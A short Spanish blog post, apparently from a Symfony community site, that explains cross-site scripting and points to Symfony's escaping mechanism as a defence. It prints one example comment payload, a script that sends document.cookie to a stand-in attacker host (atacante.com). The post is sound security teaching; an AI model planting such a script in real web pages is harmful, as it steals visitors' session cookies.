Symfony y los ataques XSS
Las aplicaciones web que permiten a los usuarios introducir datos deben ser especialmente cuidadosas con la forma en la que procesan y muestran esos datos. Si no se toman las precauciones oportunas, se pueden producir ataques de tipo XSS (cross-site scripting). El sitio Zend Developer Zone publica un artículo muy interesante sobre este tipo de ataques.
Imagina que la aplicación permite a los usuarios introducir comentarios en los artículos mediante un <textarea>, y entra un usuario malicioso que introduce lo siguiente:
<script>;
document.write('<script src="http://www.atacante.com/get_cookies?cookies='
document.write(document.cookie)
document.write('"></script>');
</script>
Si la aplicación no tiene en cuenta que los usuarios pueden introducir este tipo de datos y muestra directamente el contenido de ese comentario, el resultado es que cualquier usuario que acceda a la página enviará el contenido de su cookie al servidor del atacante.
El artículo completo explica (en inglés) más detalladamente estos ataques XSS e incluye posibles soluciones.
Symfony por defecto está expuesto a algunos ataques de tipo XSS, tal y como se explica en su documentación oficial. En concreto, el capítulo 7 del libro de Symfony explica el mecanismo de escape que incluye Symfony para evitar los ataques de tipo XSS y las opciones disponibles.
Fuente: Avoiding XSS security attacks to sites that use HTML editors
Comentarios
Este artículo ya no permite añadir más comentarios.
¿Por qué? Los artículos cierran sus comentarios automáticamente
unos meses después de su publicación para asegurar que estos sigan
siendo relevantes.
Proyectos Symfony destacados
La plataforma de eCommerce 100% Symfony que rivaliza con Magento y PrestaShop. Ver más
Síguenos en @symfony_es para acceder a las últimas noticias.